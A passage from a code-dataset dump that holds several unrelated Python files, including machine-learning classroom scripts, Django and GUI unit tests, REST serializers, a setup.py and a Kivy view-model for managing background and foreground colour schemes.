plt.ylim(yy.min(), yy.max())\n plt.title(str(model.n_labels_) + \"-Class classification (k = %i) on Iris data\" % (N_NEIGHBORS))\n plt.show()\n\ndef plot_Kmeans(data, NUM_CLUSTERS = 3):\n \"\"\"\n This is a helper function that trains 8 x 8 handwritten digits data to a K-means classifier\n and visualize k cluster centers for each digit class (0 ~ 9).\n\n Note: this function is designed only for digits.csv data set.\n\n :param data: a namedtuple including inputs and labels, used to train the K-means classifier\n :param NUM_CLUSTERS: number of clusters used in K-Means classifier\n :return: None\n \"\"\"\n # Check if input data is valid\n if len(data.inputs[0]) != 64:\n print(\"Invalid input! Input data must be 8 x 8 hand-written digits!\")\n return\n # Check if NUM_CLUSTERS is a positive integer\n if isinstance(NUM_CLUSTERS, int) == False:\n print(\"Invalid input! Number of clusters must be an integer!\")\n return\n elif NUM_CLUSTERS <= 0:\n print(\"Invalid input! Number of clusters must be greater than zero!\")\n return\n\n # Run K-means Classifier\n model = KmeansClassifier(NUM_CLUSTERS)\n model.train(data.inputs, data.labels)\n cluster_centers = model.cluster_centers_\n\n fig, ax = plt.subplots(NUM_CLUSTERS, len(cluster_centers.keys()), figsize=(8, 3))\n unflattened_centers = np.array(list(cluster_centers.values())).reshape(len(cluster_centers.keys()), NUM_CLUSTERS, 8,\n 8)\n for i in range(len(ax[0])):\n for j in range(len(ax)):\n axi = ax[j][i]\n center = unflattened_centers[i, j, :, :]\n axi.set(xticks=[], yticks=[])\n axi.imshow(center, interpolation='nearest', cmap=plt.cm.binary)\n plt.show()\n\n\ndef test_KNN(train_data, test_data, N_NEIGHBORS = 6):\n \"\"\"\n Create a K-Nearest Neighbor classifier, train it with train_data and print the accuracy of model on test_data\n\n :param train_data: a namedtuple including training inputs and training labels\n :param test_data: a namedtuple including test inputs and test labels\n :param N_NEIGHBORS: number of neighbors used in KNN classifier\n :return: None\n \"\"\"\n # Check if NUM_NEIGHBORS is a positive integer\n if isinstance(N_NEIGHBORS, int) == False:\n print(\"Invalid input! Number of neighbors must be an integer!\")\n return\n elif N_NEIGHBORS <= 0:\n print(\"Invalid input! Number of neighbors must be greater than zero!\")\n return\n\n # Run K Nearest Neighbors Classifier\n model = KNeighborsClassifier(N_NEIGHBORS)\n model.train(train_data.inputs, train_data.labels)\n accuracy = model.accuracy(test_data)\n print(\"Testing on K Nearest Neighbor Classifier (K = \" + str(N_NEIGHBORS) + \"), the accuracy is {:.2f}%\".format(accuracy * 100))\n\ndef test_Kmeans(train_data, test_data, NUM_CLUSTERS = 3):\n \"\"\"\n Create a K-Means classifier, train it with train_data and print the accuracy of model on test_data\n\n :param train_data: a namedtuple including training inputs and training labels\n :param test_data: a namedtuple including test inputs and test labels\n :param NUM_CLUSTERS: number of clusters used in K-Means classifier\n :return: None\n \"\"\"\n # Check if NUM_CLUSTERS is a positive integer\n if isinstance(NUM_CLUSTERS, int) == False:\n print(\"Invalid input! Number of clusters must be an integer!\")\n return\n elif NUM_CLUSTERS <= 0:\n print(\"Invalid input! Number of clusters must be greater than zero!\")\n return\n\n # Run K-means Classifier\n model = KmeansClassifier(NUM_CLUSTERS)\n model.train(train_data.inputs, train_data.labels)\n accuracy = model.accuracy(test_data)\n print(\"Testing on K-Means Classifier (K = \" + str(NUM_CLUSTERS) + \"), the accuracy is {:.2f}%\".format(accuracy * 100))\n\n\ndef test_Dtree(data):\n \"\"\"\n Create a Decision Tree classifier, using part of the data constructing the tree\n\n :param data: a panda DataFrame object\n :return: None\n \"\"\"\n # In order to construct the tree, the data will be parsed to a form of 2-d array,\n # with data[:,0] as the label, and data[:,1:] as the values for each feature\n data = data.values.tolist()\n random.shuffle(data)\n ratio = 0.66\n num_train = int(np.ceil(len(data) * ratio))\n train_data = data[:num_train]\n test_data = data[num_train:]\n\n # Construct the decision tree\n decision_tree = DecisionTree(train_data, gain_function='entropy')\n\n # Uncomment the next line if you would like to see your tree printed. Please\n # note that printing works best on shallow trees.\n # decision_tree.print_tree()\n print(\"\\nExploring dataset with entropy...\")\n print(\"Training size: \",len(train_data) )\n print(\"Test size: \",len(test_data) )\n print(\"Training data accuracy\", decision_tree.accuracy(train_data))\n print(\"Test data accuracy\", decision_tree.accuracy(test_data))\n\n decision_tree = DecisionTree(train_data, gain_function='gini_index')\n print(\"\\nExploring dataset with gini index...\")\n print(\"Training size: \",len(train_data) )\n print(\"Test size: \",len(test_data) )\n print(\"Training data accuracy\", decision_tree.accuracy(train_data))\n print(\"Test data accuracy\", decision_tree.accuracy(test_data))\n\ndef main():\n\n random.seed(0)\n np.random.seed(0)\n if len(sys.argv) != 2:\n print('Incorrect number of argments. Usage: python main.py ')\n exit()\n\n script, filename = sys.argv\n\n Dataset = namedtuple('Dataset', ['inputs', 'labels'])\n\n # Read data\n data = pd.read_csv(filename, header = 0)\n\n # We assume labels are in the first column of the dataset\n labels = data.values[:, 0]\n\n # If labels are of type string, convert class names to numeric values\n if isinstance(labels[0], str):\n classes = np.unique(labels)\n class_mapping = dict(zip(classes, range(0, len(classes))))\n labels = np.vectorize(class_mapping.get)(labels)\n\n # Features columns are indexed from 1 to the end, make sure that dtype = float32\n inputs = data.values[:, 1:].astype(\"float32\")\n\n # Split data into training set and test set with a ratio of 2:1\n train_inputs, test_inputs, train_labels, test_labels = train_test_split(inputs, labels, test_size = 0.33)\n\n all_data = Dataset(inputs, labels)\n train_data = Dataset(train_inputs, train_labels)\n test_data = Dataset(test_inputs, test_labels)\n print(\"Shape of training data inputs: \", train_data.inputs.shape)\n print(\"Shape of test data inputs:\", test_data.inputs.shape)\n\n # DO NOT MODIFY ABOVE THIS LINE!\n # TODO: call test_KNN(), test_Kmeans() and test_Dtree() to test your implementation\n # TODO: try out plot_KNN() on the iris data and plot_Kmeans() on the digits data\n\n test_KNN(train_data,test_data,N_NEIGHBORS = 3)\n test_KNN(train_data,test_data,N_NEIGHBORS = 4)\n test_KNN(train_data,test_data,N_NEIGHBORS = 5)\n test_KNN(train_data,test_data,N_NEIGHBORS = 6)\n test_KNN(train_data,test_data,N_NEIGHBORS = 8)\n test_KNN(train_data,test_data,N_NEIGHBORS = 10)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 2)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 3)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 4)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 5)\n #test_Dtree(data)\n\n plot_KNN(train_data)\n #plot_Kmeans(train_data)\n\nif __name__ == '__main__':\n main()\n","sub_path":"k-means/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448226869","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport unittest\n\nimport numpy as np\n\nfrom glassure.gui.controller.glassure import GlassureController\nfrom glassure.tests.gui_tests.utility import set_widget_text, click_checkbox, click_button, QtTest, prepare_file_loading\n\n\n\nclass GlassureFunctionalTest(unittest.TestCase):\n def setUp(self):\n self.controller = GlassureController()\n self.widget = self.controller.main_widget\n self.model = self.controller.model\n\n def test_normal_workflow(self):\n # Edd opens the program and wants to load his data and background file:\n\n prepare_file_loading('Mg2SiO4_ambient.xy')\n self.controller.load_data()\n prepare_file_loading('Mg2SiO4_ambient_bkg.xy')\n self.controller.load_bkg()\n\n # he gives the composition of the sample and the normalization procedure is automatically done and he sees\n # a computed g(r) and s(q)\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n self.widget.left_control_widget.composition_widget.add_element('Mg', 2)\n self.widget.left_control_widget.composition_widget.add_element('Si', 1)\n self.widget.left_control_widget.composition_widget.add_element('O', 4)\n\n self.assertEqual(self.model.composition, {'Mg': 2, 'Si': 1, 'O': 4})\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # Now he wants to enter the correct density value:\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n set_widget_text(self.widget.density_txt, 2.9)\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # Then he he adjusts the scale of the background data and it automatically adjusts sq and gr\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n self.widget.bkg_scaling_sb.setValue(0.5)\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # now he adjusts the smoothing and sees the things change in respect to\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n self.widget.smooth_sb.setValue(3)\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # now he wants to see how the data looks when choosing a larger Q-range\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n set_widget_text(self.widget.q_max_txt, 12)\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # he thinks there are still strong oscillations at the lower r-region, and wants to see what the Loch\n # modification function will do\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n click_checkbox(self.widget.use_modification_cb)\n\n self.assertTrue(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # the data unfortunately is not measured up to a Q of 0 A^-1, however the missing data below 1 A^-1 is already\n # extrapolated with a step function, he thinks the polynomial option might be a better choice, selects it and\n # sees the change:\n\n self.assertLess(self.widget.pattern_widget.sq_items[0].getData()[0][0], 0.5)\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n click_checkbox(self.widget.left_control_widget.extrapolation_widget.poly_extrapolation_rb)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n # changing the q_max value, gives an even better result for the polynomial extrapolation\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n set_widget_text(self.widget.extrapolation_q_max_txt, 1.5)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n # looks good already! However, the oscillations below 1 Angstrom bother him still a lot, so he wants to\n # optimize this by using the Eggert et al. (2002) method:\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n click_checkbox(self.widget.optimize_activate_cb)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n # However he realizes that the default cutoff might too low for this kind of data. and gives a larger number,\n # and optimizes again:\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n set_widget_text(self.widget.optimize_r_cutoff_txt, 1.2)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n def test_working_with_configurations(self):\n # Edd starts to mak some analysis\n prepare_file_loading('Mg2SiO4_ambient.xy')\n self.controller.load_data()\n prepare_file_loading('Mg2SiO4_ambient_bkg.xy')\n self.controller.load_bkg()\n\n self.widget.left_control_widget.composition_widget.add_element('Si', 1)\n\n # He likes the default parameters, but wants to test it against another density, therefore he saves the current\n # state\n\n click_button(self.widget.freeze_configuration_btn)\n\n # and magically sees that there are now is a field in the configuration table and extra other lines in the plot\n # widgets\n\n self.assertEqual(self.widget.configuration_tw.rowCount(), 2)\n","sub_path":"glassure/tests/gui_tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"358523417","text":"from rest_framework.serializers import(\n ModelSerializer ,\n HyperlinkedIdentityField ,\n SerializerMethodField, )\n\nfrom posts.models import Post\n\nclass PostListSerializer(ModelSerializer):\n url =HyperlinkedIdentityField(\n view_name='posts-api:detail',\n lookup_field='slug'\n )\n user= SerializerMethodField()\n class Meta:\n model=Post\n fields=[\n 'url',\n 'user',\n 'title',\n 'slug',\n 'content',\n 'id',\n 'publish',\n ]\n def get_user(self, obj):\n return str(obj.user.username) \nclass PostDetailSerializer(ModelSerializer):\n class Meta:\n model=Post\n fields=[\n 'title',\n 'slug',\n 'content',\n 'id',\n 'publish',\n ]\nclass PostCreateUpdateSerializer(ModelSerializer):\n class Meta:\n model=Post\n fields=[\n 'title',\n # 'slug',\n 'content',\n # 'id',\n 'publish',\n ]\n","sub_path":"src/posts/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"623249633","text":"from unittest.mock import Mock\n\nimport click\nimport pytest\n\nfrom coworks.cws.command import CwsCommand, CwsCommandError\nfrom tests.coworks.tech_ms import *\n\ncmd_mock = Mock()\n\n\nclass MyCommand(CwsCommand):\n def multi_execute(cls, project_dir, workspace, execution_list):\n cmd_mock()\n for command, options in execution_list:\n assert project_dir == 'tests/cws'\n assert options['module'] == 'test_cmd'\n assert options['workspace'] == 'dev'\n assert options['service'] == 'test'\n\n\nclass MyCommandWithOptions(MyCommand):\n\n @property\n def options(self):\n return [\n *super().options,\n click.option('--param', required=True),\n click.option('--other', required=True),\n click.option('--nothing'),\n ]\n\n\nclass TestCommand:\n\n def test_command(self):\n simple = SimpleMS()\n MyCommand(simple, name='test')\n\n with pytest.raises(CwsCommandError) as pytest_wrapped_e:\n simple.execute('autre', project_dir='tests/cws', module='test_cmd', workspace='dev')\n assert pytest_wrapped_e.type == CwsCommandError\n assert pytest_wrapped_e.value.msg == 'The command autre was not added to the microservice test.\\n'\n\n simple.execute('test', project_dir='tests/cws', module='test_cmd', workspace='dev')\n cmd_mock.assert_called_once()\n\n simple.execute('test', project_dir='tests/cws', module='test_cmd', workspace='dev', help=None)\n\n def test_command_with_options(self):\n simple = SimpleMS()\n MyCommandWithOptions(simple, name='test_command_with_options')\n\n with pytest.raises(CwsCommandError) as pytest_wrapped_e:\n simple.execute('test_command_with_options', project_dir='tests/cws', module='test_cmd', workspace='dev')\n assert pytest_wrapped_e.type == CwsCommandError\n assert pytest_wrapped_e.value.msg == 'missing parameter: param'\n\n simple.execute('test_command_with_options', project_dir='tests/cws', module='test_cmd', workspace='dev',\n param='param', other='other')\n","sub_path":"tests/cws/test_cmd.py","file_name":"test_cmd.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"83457815","text":"# -*- coding: utf-8 -*-\n\nimport json, requests\n\nfrom silo_user.user.db import User\nfrom util_test.base import get_url, create_test_user, login_test_user\nfrom util_test.database import flush_database\n\n\n# def test_create():\n#\n# flush_database()\n#\n# result = create_test_user()\n#\n# assert result['success'] is True\n#\n#\n# def test_login():\n#\n#\n# s = requests.Session()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.Login'),\n#\n# data = {\n#\n# 'email': 'test@example.com',\n# 'password': '12345678'\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n#\n# def test_update_pass():\n#\n# s, viewer_hid = login_test_user()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.UpdatePass'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid,\n# 'old_password': '12345678',\n# 'new_password': '87654321'\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# # Reset the password to the default value so that further unit tests work\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.UpdatePass'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid,\n# 'old_password': '87654321',\n# 'new_password': '12345678'\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n#\n# def test_update_profile():\n#\n# s, viewer_hid = login_test_user()\n#\n# new_first_name = 'NewName'\n# new_tagline = 'New Tagline'\n# new_bio = 'New Bio'\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.UpdateProfile'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid,\n# 'first_name': new_first_name,\n# 'tagline': new_tagline,\n# 'bio': new_bio\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# # Verify all of the row's columns have been correctly updated by fetching the User\n# # record directly from the database\n#\n# user = User.objects.filter(email='test@example.com').first()\n#\n# assert user.first_name == new_first_name\n# assert user.tagline == new_tagline\n# assert user.bio == new_bio\n#\n#\n# def test_retrieve_single():\n#\n# s, viewer_hid = login_test_user()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.RetrieveSingle'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# assert result['data']['bio'] == 'New Bio'\n# assert result['data']['first_name'] == 'NewName'\n# assert result['data']['viewer_hid'] == viewer_hid\n# assert result['data']['target_hid'] == viewer_hid\n# assert result['data']['tagline'] == 'New Tagline'\n# assert result['data']['avatar_url'] == 'hydra/img/src/user/avatar_7.jpg'\n#\n#\n# def test_retrieve_edit():\n#\n# s, viewer_hid = login_test_user()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.RetrieveEdit'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# assert result['data']['bio'] == 'New Bio'\n# assert result['data']['first_name'] == 'NewName'\n# assert result['data']['viewer_hid'] == viewer_hid\n# assert result['data']['target_hid'] == viewer_hid\n# assert result['data']['tagline'] == 'New Tagline'\n# assert result['data']['avatar_url'] == 'hydra/img/src/user/avatar_7.jpg'\n# assert result['data']['email'] == 'test@example.com'\n\n\ndef test_avatar():\n s, viewer_hid = login_test_user()\n\n result = json.loads(s.post(\n\n url=get_url('ApiHelios.User.AvatarStash'),\n\n files={\n\n 'image': open('/srv/luna/helios/util_test/assets/nasa_moon.jpg', 'rb')\n },\n\n data={\n\n 'target_hid': viewer_hid,\n 'resize_width': 600,\n 'resize_height': 600,\n 'mode': 'avatar'\n }\n\n ).text)\n\n assert result['success'] is True\n\n assert result['data']['x'] == 600\n assert result['data']['y'] == 600\n assert len(result['data']['image']) > 0\n assert len(result['data']['guid']) > 0\n assert 0.0 < float(result['data']['min_crop_x']) < 1.0\n assert 0.0 < float(result['data']['min_crop_y']) < 1.0\n\n result = json.loads(s.post(\n\n url=get_url('ApiHelios.User.AvatarCrop'),\n\n data={\n\n 'target_hid': viewer_hid,\n 'stash_guid': result['data']['guid'],\n 'x1': 10,\n 'y1': 10,\n 'x2': 590,\n 'y2': 590,\n }\n\n ).text)\n\n assert result['success'] is True\n\n assert len(result['data']['avatar_url']) > 0\n","sub_path":"helios/util_test/api_helios/test_geo.py","file_name":"test_geo.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"354594754","text":"import tensorflow as tf\n\ntf.set_random_seed(777) # for reproducibility\nqueue = tf.train.string_input_producer(['data.csv'], shuffle=False, name='queue')\nreader = tf.TextLineReader()\nkey, value = reader.read(queue)\ndefaults = [0.] * 17\ndata = tf.decode_csv(value, record_defaults=defaults)\ntrain_x_batch, train_y_batch = tf.train.batch([data[0:-1], data[-1:]], batch_size=4)\nnb_class = 7\n\nX = tf.placeholder(tf.float32, shape=[None, 16])\nY = tf.placeholder(tf.int32, shape=[None, 1])\nY_one_hot = tf.reshape(tf.one_hot(Y, nb_class), [-1, nb_class])\n\nW = tf.Variable(tf.random_normal([16, nb_class]), name='weight')\nb = tf.Variable(tf.random_normal([nb_class]), name='bias')\n\nlogits = tf.matmul(X, W) + b\nhypothesis = tf.nn.softmax(logits)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=Y_one_hot))\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(cost)\n\npredicted = tf.argmax(hypothesis, 1)\nreal = tf.argmax(Y_one_hot, 1)\naccuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, real), dtype=tf.float32))\n\nwith tf.Session() as sess:\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n sess.run(tf.global_variables_initializer())\n\n for step in range(8001):\n x_batch, y_batch = sess.run([train_x_batch, train_y_batch])\n sess.run(optimizer, feed_dict={X: x_batch, Y: y_batch})\n if step % 2000 == 0:\n loss, acc = sess.run([cost, accuracy], feed_dict={X: x_batch, Y: y_batch})\n print(\"STEPS {:5} | Loss {:.3f} | Acc {:.3%}\".format(step, loss, acc))\n\n x_batch, y_batch = sess.run([train_x_batch, train_y_batch])\n pred = sess.run(predicted, feed_dict={X: x_batch})\n for p, y in zip(pred, y_batch.flatten()):\n print(\"[{}] Predictied {} : {} Real Y\".format(p == int(y), p, int(y)))\n\n coord.request_stop()\n coord.join(threads)\n\n","sub_path":"fancy_softmax.py","file_name":"fancy_softmax.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"410081540","text":"from django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom .models import Mineral\n\n\nclass MineralViewTests(TestCase):\n\n def setUp(self):\n self.mineral = Mineral.objects.create(\n name='mineral',\n )\n self.mineral2 = Mineral.objects.create(\n name='mineral2'\n )\n\n def test_mineral_list_view(self):\n resp = self.client.get(reverse('minerals:list'))\n self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral, resp.context['minerals'])\n self.assertIn(self.mineral2, resp.context['minerals'])\n self.assertContains(resp, self.mineral.name)\n self.assertTemplateUsed(resp, 'minerals/index.html')\n\n def test_mineral_detail_view(self):\n resp = self.client.get(reverse('minerals:detail',\n kwargs={'pk': self.mineral.pk}))\n self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral.name, resp.context['properties'].values())\n self.assertContains(resp, self.mineral.name)\n self.assertTemplateUsed(resp, 'minerals/detail.html')\n","sub_path":"minerals/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"295558372","text":"import setuptools\n\nwith open(\"requirements.txt\") as f:\n requirements = [each.strip() for each in f.readlines()]\n\nsetuptools.setup(\n name=\"diff2HtmlCompare\",\n version=\"0.1.0\",\n url=\"https://github.com/wagoodman/diff2HtmlCompare\",\n license=\"MIT\",\n author=\"wagoodman\",\n packages=setuptools.find_packages(),\n install_requires=requirements,\n entry_points={\n \"console_scripts\": [\"diff2HtmlCompare = diff2HtmlCompare:cmd\"]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"550970113","text":"#66 Vários números com fag(baandeira, flag, break, interrupção do while)\r\n\r\ncont=0\r\nsoma=0\r\n\r\nwhile True:\r\n n=int(input('Digite um valor (0 zero para parar): '))\r\n if n==999:\r\n break\r\n soma+=n\r\n cont+=1\r\nprint(f'A soma dos {cont} valores foi {soma}!')\r\n","sub_path":"Exercícios/ex066.py","file_name":"ex066.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"642125728","text":"from kivy.app import App\r\n\r\nfrom dryfire.model.targetsModel import \\\r\n PaperPlateDryFireTargetModel, BeerCanDryFireTargetModel, \\\r\n HeadDryFireTargetModel, HipsAndHeadDryFireTargetModel, \\\r\n TorsoDryFireTargetModel, ISPCMetricCZoneDryFireTargetModel, \\\r\n ISPCClassicCZoneDryFireTargetModel\r\nfrom dryfire.view.targetSlide import TargetSlide\r\nfrom dryfire.model.persistentData import BGFGsModel\r\n\r\n\r\nclass BGFGsViewModel(object):\r\n \"\"\"\r\n The view model for the InitialView class.\r\n \"\"\"\r\n\r\n def __init__(self, view):\r\n self._view = view\r\n self._appdata = App.get_running_app().appdata\r\n self._record_ident = None\r\n self._record = {}\r\n\r\n # view methods\r\n\r\n def v_initialize_view(self):\r\n # initialize view with bgfgs records\r\n bgfgs = self._appdata['bgfgs']\r\n idents = bgfgs.data.keys()\r\n for i in idents:\r\n record = bgfgs.get(i)\r\n self._view.vm_add_bgfg(i, record['description']) \r\n \r\n # step 1 : the user pressed the add a new record button\r\n \r\n def w_handle_create_button_on_press(self, instance):\r\n self._record_ident = None\r\n self._record = self._appdata['bgfgs'].default_record\r\n self.w_colorize()\r\n \r\n # other step 1 : the user selects a bgfg record action\r\n # to edit or delete\r\n \r\n def w_handle_bgfg_record(self, ident):\r\n # the user has selected a bgfg record\r\n self._record_ident = ident\r\n self._record = self._appdata['bgfgs'].get(ident)\r\n self.select_a_bgfg_record_option()\r\n\r\n def select_a_bgfg_record_option(self):\r\n from dryfire.view.bgfgsView import BGFGsView\r\n # offer options for the record\r\n bgfgs = self._appdata['bgfgs']\r\n if bgfgs.count == 1:\r\n self.w_colorize()\r\n else:\r\n options = BGFGsView.commands\r\n self._view.select_options('Options',\r\n options,\r\n options[0],\r\n self.w_handle_bgfgs_record_command,\r\n help='What would you like to do with this record?')\r\n\r\n def w_handle_bgfgs_record_command(self, command):\r\n from dryfire.view.bgfgsView import BGFGsView\r\n if command == BGFGsView.edit_command:\r\n self.w_colorize()\r\n elif command == BGFGsView.delete_command:\r\n ranges = self._appdata['ranges']\r\n if ranges.using_bgfg(self._record_ident):\r\n question = \"You are using this color scheme with some of your\"\\\r\n \" target setups. If you delete this color scheme those target\"\\\r\n \" setups will also be deleted.\\n\"\r\n else:\r\n question = \"\" \r\n # let the user confirm deletion\r\n question += 'Are you sure that you want to '\\\r\n 'delete the color scheme record %s?' % (self._record['description'])\r\n self._view.question_yes_no('Delete a Color Scheme Record.',\r\n question,\r\n self.delete_a_bgfg,\r\n back_handler=self.select_a_bgfg_record_option)\r\n else:\r\n self._view.warn(\"Unknown command.\")\r\n\r\n # step 2 : user deletes a bgfg \r\n\r\n def delete_a_bgfg(self, true_false):\r\n if true_false is True:\r\n ident = self._record_ident\r\n bgfgs = self._appdata['bgfgs'] \r\n bgfg_backup = bgfgs.backup() \r\n ok = bgfgs.remove(ident)\r\n if ok:\r\n # delete the ranges records that use the bgfg.\r\n # first get the idents of those ranges\r\n ranges = self._appdata['ranges']\r\n ran_backup = ranges.backup()\r\n ranges_remove_list = ranges.get_idents_using_bgfg(ident)\r\n for i in ranges_remove_list:\r\n ok = ranges.remove(i)\r\n if not ok:\r\n break\r\n if ok:\r\n # ranges were deleted so write the bgfgs and ranges.\r\n # backup, delete, restore if needed\r\n ok, mess = bgfgs.write()\r\n if ok:\r\n ok, mess = ranges.write()\r\n if ok:\r\n self._view.vm_show_bgfg_deleted(ident)\r\n if ok:\r\n ranges_view = self._appdata['ranges_view']\r\n ranges_view.vm_remove_ranges(ranges_remove_list)\r\n else:\r\n bgfgs.restore(bgfg_backup)\r\n ranges.restore(ran_backup)\r\n self._view.message_warn('Unable to delete %s.' % (self._record['description']))\r\n else:\r\n self._view.message_warn('Nothing deleted.')\r\n \r\n # step 2 : user edits a record\r\n # select calibrates one inch\r\n\r\n def w_colorize(self):\r\n kwargs = {}\r\n if self._record_ident is not None:\r\n kwargs['back_handler'] = self.select_a_bgfg_record_option\r\n # let the user select colors\r\n # self._record and self._record_ident are set\r\n self._view.select_bgfg_colors('Select Background and Foreground Colors.',\r\n self._record['bg'],\r\n self._record['fg'],\r\n self.w_handle_on_bgfg_selected)\r\n\r\n def w_handle_on_bgfg_selected(self, bg, fg):\r\n # the user has set the colors.\r\n self._record['bg'] = bg\r\n self._record['fg'] = fg\r\n # next is the description\r\n self.w_enter_description()\r\n \r\n # step 3 : describe the monitor and bgfg\r\n \r\n def w_enter_description(self, **kwargs):\r\n kwargs['back_handler'] = self.w_colorize \r\n self._view.edit_line('Short description.',\r\n 'Enter a short description of the color scheme.',\r\n self._record['description'],\r\n self.w_handle_on_description_enter,\r\n **kwargs)\r\n\r\n def w_handle_on_description_enter(self, description):\r\n # check length\r\n description = description.strip()\r\n if len(description) > 0:\r\n # make sure that the description is not already being used.\r\n bgfgs = self._appdata['bgfgs']\r\n ident = bgfgs.get_ident_using_description(description)\r\n if ident is not None and ident != self._record_ident:\r\n help = 'You are already using the description \"%s\"'\\\r\n ' with another bgfg.' % (description) \r\n self.w_enter_description(help=help)\r\n else:\r\n self._record['description'] = description\r\n self._save_record()\r\n else:\r\n help = 'You did not enter any text.' \r\n self.w_enter_description(help=help)\r\n\r\n # non public methods\r\n \r\n def _save_record(self):\r\n bgfgs = self._appdata['bgfgs']\r\n # save the record\r\n backup = bgfgs.backup()\r\n if self._record_ident is None:\r\n ok, ident = bgfgs.add(self._record_ident, self._record)\r\n if ok:\r\n ok, mess = bgfgs.write()\r\n if ok:\r\n self._view.vm_show_bgfg_added(ident, self._record['description'])\r\n else:\r\n ok = bgfgs.set(self._record_ident, self._record)\r\n if ok:\r\n ok, mess = bgfgs.write()\r\n if ok:\r\n self._view.vm_show_bgfg_edited(self._record_ident, 